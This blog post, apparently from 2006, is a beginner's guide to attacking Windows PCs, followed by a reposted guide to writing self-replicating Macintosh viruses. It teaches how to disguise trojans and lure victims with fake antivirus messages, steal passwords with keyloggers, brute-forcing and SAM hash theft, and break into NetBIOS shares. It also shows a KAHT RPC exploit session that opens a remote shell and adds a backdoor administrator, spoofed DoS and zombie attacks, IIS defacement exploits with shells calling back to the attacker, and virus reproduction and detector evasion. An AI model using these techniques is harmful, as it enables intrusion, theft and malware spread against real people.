DarkDimention
Thursday, November 30, 2006
Websites for serial numbers and cracks
Beginners guide to hacking windows by Dark Dimention
How do I hack? - There is no easy way how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you alot.
What do I need to be able to hack? - Firstly you need to understand how your computers operating system works, networks and protocols works, security settings and general PC knowledge. After you understand how it works you need hacking tools which helps you to hack.
What is command prompt (cmd- the little dos Windows)? - Go START, RUN and type in: "cmd"
What can I do in cmd? - You can can do various things with it like run exploits or do a ping request.
Why does some of the hacking tools I download just close itself when I open them? - Lot's of hacking tools are DOS based and has to be run through CMD. If you double click on the program it will open a DOS box and automaticly close the box. From CMD you can navigate to the directory which your hacking tool is stored in and run it from there.
What is a IP address? - Every computer connected to the Internet or some network has a IP address. Goto START, RUN and type in "cmd" then type in "ipconfig" it will show you your IP adress or adresses. It will look something like this : 81.35.99.84. IP = internet protocol.
How do I find someone's IP adress? - Look further down in this tutorial and use IPSTEALER
What can I do with a IP? - Well you need someone's IP before you can hack, portscan or DOS them.
What is IP ping ? - It's a command you can use to check if someone's IP address is online, to check it they connected to the Internet or a network. In command prompt type in "ping 192.168.0.21" - this will show you something like this :
Pinging 192.168.0.21 with 32 bytes of data:
Reply from 192.168.0.21: bytes=32 time<1ms ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" bytes="32" ttl="">
Ping statistics for 192.168.0.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
That means you can succesfully PING IP 192.168.0.21 which means the IP is online. If you get a message "request timed out" it means the IP is not online.
Bytes=32 is the ammount of data which was sent to the host.
Time<1ms>
Why can't I ping a certain IP? - Either the IP is not online/ in use or the person your trying to ping is running a firewall which blocks ping requests or maybe your firewall is blocking outgoing ping requests
What is 127.0.0.1 IP? - It is your PC's local loopback IP address.
Why do I have two IP addresses when I do a ipconfig? - Well if your on a local LAN (Local area network) you will have a IP like 192.168.0.1. If your also directly connected to the internet you will have another IP address like 80.87.34.56. 192.168.0.1 is your local IP which you use to comunicate with your local internet network (lan) and 80.87.34.56 is your internet IP.
What is a static and dynamic IP address? - Static means permanent set IP address - like a website will have a static IP address, it never changes. Dynamic means temporary IP address - dailing up to the Internet with a modem or most ADSL connections has dynamic IP's. Everytime you logon to the Internet your ISP ( Internet Service Provider ) will issue you a new IP address.
I have sent someone a trojan but I cannot connect to their PC? - Either they are running a firewall which blocks you from connecting to their PC, or they are connected to the internet through a router.
What do I do when someone is behind a router and I want to control their PC with a trojan? - You will need to use a trojan which uses reverse connections - meaning you don't connect to the host, the host connects to you. Bifrost is a trojan which has the mentioned function. Remember when someone is behind a router and your using IPstealer to get hold of their IP address, you are actually getting their routers IP, not their actual PC's IP. The router will have the persons internet IP (WAN IP) and their PC will have a difirent IP - their LAN IP.
How do I check if my own PC is infected with a trojan? - Do a port scan on your PC and check which ports are open. If you find any open ports in this trojan port list you might be infected with a trojan. Download the trojan you think you might be infected with and connect to that specified port.
What is a router? - A device which is used to route data on a network. a Router decides where certain traffic should be sent to.
What is a firewall? - Its a software or hardware device which can block or permit certain ports or IP's or certain kinds of data.
What is a port and what can I do with it? - Every program running on your PC which has some network function uses a specific port to send an receive data though. If you do a port scan you will see which ports are open on the host you scanned. Port 80 is normally a web server. Port 21 a FTP server ect ect.. Trojans also uses ports. Check this list of trojan ports, if you find an open port in this list, the host might be infected with a trojan, download the trojan and try connecting to the port.
How do I do a port scan? - You need a program like superscan to do a portscan. Then all you do is add the ip you want to scan.
Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you which programs or services are running on the PC.
Common ports:
Ping : 7
Systat : 11
Time : 13
NetStat : 15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110
What is a exploit? - It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there.
How do I use a exploit? - You first need to compile the exploit with a program like Bloodshed C++ compiler. Then you can start the exploit through command prompt and see if the system your trying to exploit is vulnerable to that specific exploit. Scroll down for more information about exploits.
What is a exploit POC? - POC stands for proof of concept and it the proof that a exploit works.
What is a DOS attack? - It is when too much data is being sent to a host and it cannot handle all the data and disconnects from the Internet.
How do I see what connections is currently made to my PC? - In cmd type in "netstat" - it will show you IP addresses of connections to your PC and what port it is using.
What is a MAC address? - Its a hard coded number, almost like a name which is embedded into a network card. It identifies the manufacturer of the card and a unique number for the card. No two network cards in the world has the same MAC address.
How do I find out my own or someone else's MAC address? -
Your own MAC = Goto cmd and type in "ipconfig /all"
MAC address looks something like this : 00-13-20-A3-0B-4C
Someone else's MAC address you need their IP address and then goto cmd and type in "nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address as well as their currently logged on user.
What is a Windows Registry and how do I access it? - Its where Windows stores most of the configurations of your operating system and most programs installed. You might used it to make a trojan server file you uploaded to the PC run automaticly when Windows starts up. To access the registry go START, RUN and type in "regedit"
Carefull what you change in the registry, it might screw up you PC.. First make a backup of the registry.
How do I hack a webpage/ web server? - Read the IIS hacking tutorial in the MISC download section on Windows Hacker. Remember not all webservers run IIS!
What is IIS? - It is Microsoft's web server. IIS - Internet information server. Most webservers run on port 80.
How do I check if a website is running on IIS? - Telnet to the website URL through CMD - "telnet www.siteyouwanttocheck.com 80"
What is telnet? - Program which can be used to connect to remote computers or routers and to run commands by simply typing them in its window.
How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then someone discovers a way to get into those email servers, but the service provider fixes the security hole so fast, there is no straight answer for that. Best way is to install a keylogger on the victims PC and get their login details. Otherwise download THIS program which you can use to brute force a hotmail account.
How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the POP3 password.
What is a keylogger? - It is a program you install on someone's PC which captures every key that is pressed on their keyboard which is emailed to you or stored into a file.
How do I get the administrator account password while logged in to the PC? - Locally run a program like Adminhack for local administrator account cracking. If you need to do it remotely run a program like Venom or Starbrute.
What is a SAM file? - SAM file is the file which stores all the user accounts and their password hashes like the Administrator account. SAM file is stored in "C:\WINDOWS\system32\config" but it is locked and inaccessable while you are busy using Windows - meaning you can't copy it while your in Windows. You need to boot up with another operating system like NTFSDOS or Linux with NTFS support. When you copied the SAM file you can crack the passwords stored in the SAM file with a program like LC5. With Pwdump6 it is possible to get access to the SAM file while logged into windows. It can also connect to a remote PC and grab the password hashes from the SAM file. Administrator account is needed.
How do I reset a administrator or some other account password on Win2K/WinXP/WinNT/Win2003? - Download Offline NT Password & Registry Editor which you can use to create a bootup disk or CD and then boot up the PC and then you can reset the password. Just remember that this program will not show you the password, you can only change the password.
How do I crack a administrator password? - If you need to crack a administrator password you will need to copy the SAM file to another machine and crack it. Download this NTXP-Cracker program which has included everything you need to boot up the PC, copy the SAM file and crack the SAM file on another machine.
How do I find out what operating system does my target run? - Download Detect and use it against your targets IP address.
Result:
C:\>detect.exe 127.0.0.1
[*]------------------------------[*]
[*] XP/2K OS Detector [*]
[*] by: illwill & phr0stic [*]
[*]------------------------------[*]
[+] Finding Host 127.0.0.1
[+] Connected to 127.0.0.1
[+] Bytes Sent: 222
[?] The box seems to be Windows XP
(2) Securing your Windows PC
Firstly install Win XP with the latest Service pack. Run Windows update (START, ALL PROGRAMS, WINDOWS UPDATE) and update Windows and all your device drivers. Go download all the latest versions of applications you use like FTP server or proxy or so, old versions of programs is insecure and you could be hacked that way..
Disable the "guest" account on your PC and rename your "administrator" account. Right click My Computer and choose Manage.
Stop any services you don't use, but be careful not to stop something that u use ( RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTERY services.
Delete the admin shares, share it as something else and then stop sharing it. Then when you reboot it will not share it automatically again. With these admin shares domain admin's and hackers can access your PC. Make sure to put a complex password on all your accounts.
Make your hard drive NTFS - it is the file system you format your harddrive with. Put a password on your BIOS and make sure you change the boot order to boot first with the hard drive, so someone cannot boot up with a CD, delete your SAM file, or crack its password and gain administrator access to your PC..
Make sure the built in firewall is enabled. Check in control panel for Windows firewall. This firewall may be the cause that some of your hacking applications and tools will stop working, so if you have a problem with an application make sure to add this program to your windows firewall exceptions.
Install some kind of anti virus program, Norton Anti Virus works good, but remember that alot of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running those tools.
Also install a Spyware removal tools like Spyware Doctor
Spyware is iritating software which is installed onto your PC through files you download from the net or webpages you open which has mallicious code in it. It slows down your PC and might send your information to the spyware creator.
(3) Using a Trojan / RAT
Trojans is one of the first things you must learn when you want to hack. A trojan is a small program you send to someone to infect their PC so you can control their PC, steal passwords, files or just have some fun.
Every trojan works on a diffirent port, like Sub7, works on port 27374. If you scan a PC and find that port 27374 is open, it means the machine is infected with Sub7. Now ofcourse the trojan can be set with a password, its up to you to crack it then. Now remember that most trojans are picked up by Anti Virus software. You need a new released trojan which AV does not pick up.
The trojan most people know is Sub7 . Before you can start using the trojan, you first need a host to infected with a trojan. A host can be infected in a alot of ways. You can send the host the trojan server file, and tell them it's an game or a firewall or whatever you like it to be. Best is to rename the file to something they will think is usefull like : WindowsXP_update.exe. You can email them this file or put it on a downloads area on a web page, use your imagination. My Favorite way is to send people a "net send" message with MSMH and choose a name like NortonAntivirust_Support and tell them their PC was detected with a virus, please goto www.yourpagewithtrojanfile.com/Virus_Cleaner_V1.20.exe and run the file to remove the virus from their PC. Net send only works on NT4 and Win2k and Win XP machines that's got messenger service enabled. Disable your messenger service, you do not want people sending you stupid messages..
You can also bind the trojan file with another file, any executable file the trojan can be binded to. Always remember to rename the file, change the program icon and the put a password on the server file. Bind the file with another file and set the file to automatically delete itself after executed, or set it to give an system error.
When you infect a host or find a infected host, it's time to connect. Easy way to find trojans infect hosts is with Trojan hunter. Choose an IP range to scan through and it will search for trojan infected hosts. When you found an infected host, download the trojan client from my Trojans page.. Connect with the trojan to the host IP, to the certain port the trojan works on and you are ready to take control. Each trojan uses a diffident port. Here is a list of ports which a certain trojan works on.
With most trojans, you will be able to log keystrokes on a PC, even get logged into a file, and when the host is online it will email the keystrokes to an specified email address. Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse. With Sub7 you can do anything on the infected host, just as if you where sitting in front of the PC itself.
Important thing to remember. A trojan comes with a file called "server.exe". Never run that file on your own PC, it will infect your PC with the trojan! Use the trojans configuration file to make changes to the "server.exe" file and then send the file to a victim.
There is also trojans which has the option to do a reverse connection. Very usefull if the person sits behind a router or firewall. After your infected the victims PC, the trojan will automaticly connects to you, thus getting past the problem of connecting through a router or firewall. Remember that if you do not connect to the Internet directly (with a modem) and you sit behind a router, you will need to forward the trojan ports in your routers configuration if you are doing a reverse connection.
Try out Bifrost RAT or Poison Ivy RAT which can do reverse connections, usefull when the host is behind a router.
(4) Hacking a PC through NetBios shares
Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share. Go START, RUN and type in "\\IP\sharename". Example "\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.
Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.
Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
(5) Hacking a PC with a exploit
What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Check this page for new exploits : http://www.frsirt.com/exploits/
Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.
Read this tutorial about compiling exploits.
But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.
Check this example of how a exploit works:
KAHT II - MASSIVE RPC EXPLOIT
This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.
This is an explanation of how to use it :
1. Get target IP, make sure it uses XP or 2k
2. Download exploit tool
(make sure to deactivate your AV)
3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101
note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1
4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------
Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
C:\WINNT\system32>
5. NOW.. YOU ARE IN TARGET DRIVE
6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password
7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user
8. Sharing drive
C:\WINNT\system32>net share c=c:
9. Exit from target.. dont forget!
C:\WINNT\system32>exit
10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
There you will now have a mapped drive to the target PC and an administrator account.
(6) Disconnecting someone from internet (DOS attack) - (Nuking)
Nuking was in the Windows 95/ NT4 days. The original WinNuke was for Windows 95. It attacked the host on port 139 (win95) and port 135 (winNT). Yes someone people still use Windows 95 and NT4, but not alot of people. If you find someone by any chance, use Superkod. I found it works best. Open up the program, type in the IP and Click NUKE. If the person is using Win95 or WinNT4, and their unpatched, their internet connection will be dropped or they will get a BSOD.
That's all very well and all, but with a program like KOD, it does not hide your IP from your attacker. If they are running a firewall, they will see where all this traffic is coming from and they will see it's YOU. So now, you need to spoof your IP address so the attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a broadcast list, a list it uses for address to spoof from. So if you attack someone, they will see IP's attacking them that does not exist. Before you attack someone, find out what connections he has, because if he want to attack him with bandwidth, you will need more than him. So if it is an modem user with no firewall, you will be able to disconnect him yourself. If it is someone with more bandwidth than you, a firewall or a patched system, you will need BANDWITH to disconnect him. So gather around a few of your buddies, give them a DOS tool and all of you guys at the same time attack him. Make sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming connections if they start attacking back. Heck even better, infect a few hosts on a ADSL line or a corporate line with alot of bandwidth, and take down microsoft.com.
This is the part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a DOS attack on someone. It works almost like a trojan which you infect their PC and take control of it.
Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack.
Also try DOS 3 from the DDOS section, its a very cool application and there is an detailed explanation, it also supports spoofing.
(7) Getting a PC name, MAC address and user name logged on
So you would like to know someone's PC name, or their MAC address of their network card or the username that currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, means that it can never change. Their username can also be useful if you would like to know this persons name. All of this can only be retrieved if the person has a network card installed on their PC.
In DOS prompt (Start, Run) type in " nbtstat -a IP"
EX : nbstat -a 196.35.24.15, it will show something like this :
Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1e> GROUP Registered
USERNAME <03> UNIQUE Registered
MAC Address = 00-22-AE-43-33-30
It will show you the PC name, domain name if it is connected to a domain and it will show the user name logged onto the PC. The MAC is static, meaning it never changes, useful for identifying someone. Your buddy attacks you, you check his IP and you do a "nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see he has got the same MAC address you know it was him attacking you.
(8) IP addresses, understanding it
Everyone that connects to an network, has got a IP address. A IP address looks something like this : 80.65.123.25
Your network card has an IP and your modem has an IP address if you connect to the Internet, but both is diffident because your LAN is not part of the internet. When you connect to Internet, depending on your connection, you get a fixed ( static ) IP or a dynamic IP. Modem users gets a IP address that changed every time they reconnect to internet, Very useful if you attack people, so if you disconnect, then you get a diffident IP. If you have a ISDN or maybe ADSL connection most of the time you will get a static IP, so whenever you connect to internet you get the same IP every time. Attack someone without IP spoofing, they will be able to see it is your IP attacking them! They can then go to your ISP ( internet service provider ), check who does this IP belong to and you can get into trouble. This is where modem users are lucky, they don't have a static IP and then can go mad and attack people and so without being caught, well almost... Their ISP can still check who was using the certain IP for a certain time and what telephone number it was coming from, but its too much of a hassle for a simple DOS attack.
IP spoofing is basically when you attack someone and you use a bogus IP. a DOS attack or whatever, it attacks the target, but the target only receives data from bogus IP's. IP's that does not really exist, or it does excist but it is someone else's IP, not yours.
Every network cards has a burned in MAC address. a MAC address looks something like this : 00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and they do a nbstat on you, get your MAC address of your network card, it is a simple way of identifying you as the attacker.
(9) IIS ( Web server/web page) hacking
IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers.
Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port.
If you find a IIS server, it's time to DEFACE it :) Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :
iis5 remote .printer overflow.
dark spyrit
usage: jill-win32
An example how to use it :
jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.
Here is a better explanation :
Download IISHack and do the following :
Usage: IISHack1.5 [server] [server-port] [trojan-port]
C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.
How to write a virus for MAC OS X
How To Write A Virus For The Macintosh
*or 'How I Learned To Stop Worrying And Love The Resource Manager'
document version 1.0
Due to numerous requests for this type of information, I will delve myself into the dark side and release that information by which people can be arrested. Please note that this file contains no source code and no information about destructive code, but simply gives the basic ideas and principles behind writing a reproducing code resource and how it can be used to better society.
Chapter 1: Basic Principles
A computer virus, by definition, is a piece of processor-executable code that can reproduce itself within it's environment. In the Macintosh system, an object called a resource can contain executable code. Most common executable resources are of type 'CODE', along with others such as 'DRVR', 'CDEF', 'WDEF', 'INIT', and so on. These resources are loaded into memory and 'jmp'ed to to be executed (an assembly language term for jump). Note that not only these types listed above can contain code. The trick is to get the virus code loaded and called by 'accident'.
There are many places where code resources are loaded and executed. For one example, at the launch of an application, the CODE resource with ID=0 is loaded (the jump table), and then jumps to the first listing in it's table. As another example, a 'CDEF' resource is called to draw certain controls (ID=0 for buttons, checkboxes, and radio buttons; ID=16 for scroll bars, etc.). Another example: an 'INIT' resource is called at startup time if the file which contains it is in one of the special system folders. There are numerous other places within applications, and even within system software itself, where code is loaded and called. Each virus uses a trick with one of these methods to get itself called. Some of these methods are described in more detail below.
Once the virus code is executed, it's main responsibility is to duplicate itself. This in itself is a fairly easy process. Since your executable code resource is already loaded into memory, you can use a few popular toolbox calls to place it into any other file or application that would suit your needs (where it would also have the chance of being executed). After the duplication is complete, the virus may do any other task it deems necessary.
One of the reasons why viruses crash is that their reproduction or startup code is not compatible with other systems and/or machines, not that their damage system actually did any damage. If you write code following the Inside Macintosh rules and code defensively, you should be able to write a clean piece of code that travels without problems. Always code defensively: it's your work out there� you want to be proud of it. Read below to find some tips on doing just that.
Virus testing is a very difficult process, in that your own system is constantly infected, possibly numerous times with older versions of the virus. There are methods to the madness, so again, read on.
A few of the catches to writing a virus is being aware of the methods used by virus-protection software. If simply written, a virus could be caught very quickly and not have much effect beyond your own system. If the methods are thought out and the patches made by the protection software are understood, then a virus could at least require software companies to update their existing detection methods. Every virus to date has been able to be detected and destroyed, so don't feel bad.
Is everybody happy? Then let's go!
Chapter 2: Writing Executable Code
An executable code resource is easy to create with a good software-development application such as THINK C (or C++) or THINK Pascal or MPW. There are slight differences between the environments, but nothing major. I will be giving examples for code written in THINK C, for that is the system I use.
An executable code resource usually starts with a
void main(void)
and within such, your executable code exists. Note, as always, that executable code cannot handle global variables (variables defined above the definition of the main code, accessible by the whole file/project). THINK C handles ways around this, and MPW uses the methods in Tech Note #256, but in most cases, you won't really need global variables, unless the code is complex enough to require separate procedures and/or object-oriented code. In any case, you can usually define your variables inside the main procedure itself. There aren't too many rules as far as writing code resources, so long as you know under which circumstances your code will be called. If you are patching a Toolbox trap, for example, you must take the same form as the patch you are trapping:
void ModalDialogPatch(ProcPtr procFilter,int *itemHit)
If you are patching an operating system trap, you need to do some register playing, but you need to take an empty procedure form:
void OpenPatch(void)
even though the FSOpen, PBOpen, etc. take paramBlocks. Note: they are stored in registers A0, D0, and A1 usually. Check the trap for specifics. You need to save these before you execute your code, and then restore them upon return.
If you are executing code that is to be run as a VBL or Time Manager task, always remember that you cannot use code that even thinks about using the Memory Manager (i.e. moves or purges memory). Make sure all the toolbox calls you use are not in the 'dreaded list' in the appendix of each volume of Inside Macintosh.
The type of the code resource is very dependent upon which method you wish to use to get your code executed. Read the next section for details on such execution theories.
After you're done writing the code, check it over for simple things you might have forgotten (original Quickdraw compatibility, system versions, etc.), and compile the sucker. For right now, you can throw the code resource into some sort of test file (or stagnant file, where the code will not be executed and/or reproduce). Note that you should NOT have any external resource files to compile along with it. Code resources such as this should preferably be self-contained, and not have to 'carry around the extra luggage', so to speak. There are methods to carry along bitmaps (as 'unknown data') and use them as graphics. But you should never rely on things like GetNewDialog, because that requires the existence of a DITL resource. Instead, use calls like NewDialog, where the code builds the relevant information in. It might make things harder to read and a bit harder to edit, but it's what you have to do in order to make everything self-contained.
Most of the compilers create some sort of header at the beginning of each executable code resource. This header could give away some vital information about the resource which would make it easy for a virus-detector to find. Double check it after compilation to make sure it's clean and doesn't look suspicious.
Chapter 3: Getting Your Code Executed
This technique you use here defines how your virus spreads. Some earlier viruses were more virulent than others; nVir needed an infected application to boot for it to execute; WDEF required only that a disk be inserted. There are lots of places for code to be "patched" so that your code can be executed. The trick is finding them and recovering from them gracefully. Not every method can be discussed in this note, but I will give some general examples and how to find your own 'hooks'.
One of the most popular methods amongst virii is infecting applications, since they, by definition, have executable code built right into it. If you can get your code executed along with the many other little segments in the application, the code could recover undetected. When an application starts up, the resource CODE with ID=0 is loaded into memory, and it's popularly known as the jump table. It keeps track of all of the procedures or segments in an application. If part of an application needs to call another procedure inside the application, it checks with the jump table for it's location. If it sees that the procedure is not in memory, it will load it first, then execute it. This is all taken care of by the compiler and the system software, so it's invisible to the programmer (in most cases). The system loads the jump table and immediately executes the first entry in the list when an application begins.
You can patch yourself into this list of procedures by modifying the jump table itself. You can modify the first entry of the jump table to be your code, but save the original entry so that you can call the actual application when you're done (destroying the first entry in any CODE 0 resource renders the application totally useless). So, instead of the system executing what it thinks is the application, it will run your code first, and then run the application.
Another method by which virii get executed is by utilizing a wonderful feature of the Resource Manager. As given in Inside Macintosh volume 1, the Resource Manager will look for resources in the top-most resource file that is open (the one most recently opened in most cases, unless UseResFile has been used). These searches also include searches for basic system code resources, such as window definitions, control definitions, and even international transliteration code. If you have a resource with the same type and ID as one in the system, and this resource file is open, the system will execute your resource instead of the system's. The catch again with this is that you should call the original resource as well to make your code invisible to the naked eye. This, apparently, is how the WDEF virus worked. When a disk was inserted, the desktop file was automatically opened and put in the list of resource files. Within this time that the file was open, the WDEF file which existed within was executed (the system needed to draw the window itself using the standard WDEF resource). This method requires no patching of other code and makes it very elegant. The thing that makes them easy to detect is that you find code resources in very odd places. A WDEF resource is not usually found in the desktop file.
To find other hooks for code execution, look at all the executable code inside the system. These pieces are executed at one time or another for certain calls. Things that might not seem obvious right away may make good places for patching. Lots of applications use (maybe indirectly) the International Utilities Package, for it has many good string manipulation routines. A patch there might be possible. 'ptch' resources in the system are loaded automatically at startup time to patch bits of ROM. A system could be infected there and be loaded before all other extensions. Poke around the resources and find out which ones are executable, and then find out when they are executed. You might be able to find a great patch to live off of.
Chapter 4: Reproduction
Reproduction of any code resource requires the help of the File Manager and/or the Resource Manager. The concept is not very simple, but the execution is very easy. Since the virus itself is simply one code resource (preferably not more than one), then it can be loaded, added, modified, changed, and saved just like any other resource. And the fun part of it is, you can do all this to the code you are currently executing. This is apparently dangerous (Apple warns us about self-modifying code), but we're not modifying anything about our code; simply our placement. With a few simple calls we can duplicate ourselves anywhere we wish.
When an executable code resource is called, the pointer to the resource is placed in register A0. You can use this pointer to reference yourself. A simple line of assembly can place A0 in any variable you choose. Once you have this variable, you must translate it into a handle with the RecoverHandle call. Now you have a handle to your own loaded resource, but you still cannot duplicate it. As a handle to a resource, you cannot use it to be copied into other files. You 'belong' to your owning file, and are not expected to go elsewhere. Use the DetachResource call to remove your reference to the file you came from. After this call, you are simply an executable block of memory floating around with a handle on yourself (phallic, isn't it?). All you need to have to have total freedom with a block of memory is a handle to it. You've got this free handle now. Now comes the time to find the file you have to duplicate yourself to.
The file you find depends on how your virus is designed to work. You can copy yourself into applications, into desktop files, or into the system. Again, dependent on how your executing mechanism requires it. Once you have found your file (usually with use of the File Manager), open up it's resource fork with OpenResFile or any other similar procreation of it (FSpOpenResFile, etc.). Call AddResource with the required parameters, then call WriteResource to forcefully write the resource to the file or simply close the file itself (it will automatically be saved). Your code has now copied itself into another file. Reproduction! Now just let it sit and wait for it to be called!
Chapter 5: Defensive, Clean Coding
As always, if you want your code to be run cleanly on all systems, you have to be prepared for any type of situation. Apple warns us of this all the time, so I don't have to go into too much detail, but there are a few things I would like to stress so that your code doesn't simply crash when it gets executed. You goal is then not found. Here are some tips and things to watch out for.
1. ResError. Who knows? Maybe you've been purged. Check it after every Resource Manager call you can, taking efficiency into account, of course.
2. Nil pointers. Who knows? Maybe a virus detector caught part of your set of resources (if you're using a set, which I highly discourage) and deleted them. Find an alternate route, or exit gracefully.
3. Patch well. If you are going to modify something like a jump table, be sure you keep the originals somewhere for your own use so you can call the code (pass-through coding). If you don't, and you just destroy it and call the next code resource down the line, who knows what you might be calling. A bezier-curve calculation routine does nothing if the caller knows not what he's doing.
4. File Manager. Don't depend on each hard drive being called "Macintosh HD". Don't depend on an "Applications" folder. Don't depend on anything. Read the directory and see what you find interesting. System 7's File Manager is great, but watch out for:
5. System 6 or before. You wouldn't want your code to execute only on one system version now, would you? By known figures, only 50% of Mac users use System 7. Sad, eh? But why exclude them from the pleasures of your code?
6. Error Check, Error Check, Error Check. The thought police are on you again. Never forget that nothing is permanent.
Chapter 6A: Virus Protection Software: How It Works
Virus protection software was a good idea. It worked for a while. Then it became a commercial product. Virex, SAM, etc. The best one out in the world today is freeware: Disinfectant. A beautifully-written piece by John Norstad. I personally am against commercially-written virus protection. However, I am not here to give praise to independent software authors. I am here to tell you how some of their mechanisms work.
Patching toolbox traps is a popular method of modifying the system's own code. Before it calls the real thing, it calls the patch (your code). Virus detectors use this method to keep an eye out for parameters passed through certain toolbox calls to check to see if they are virus-related.
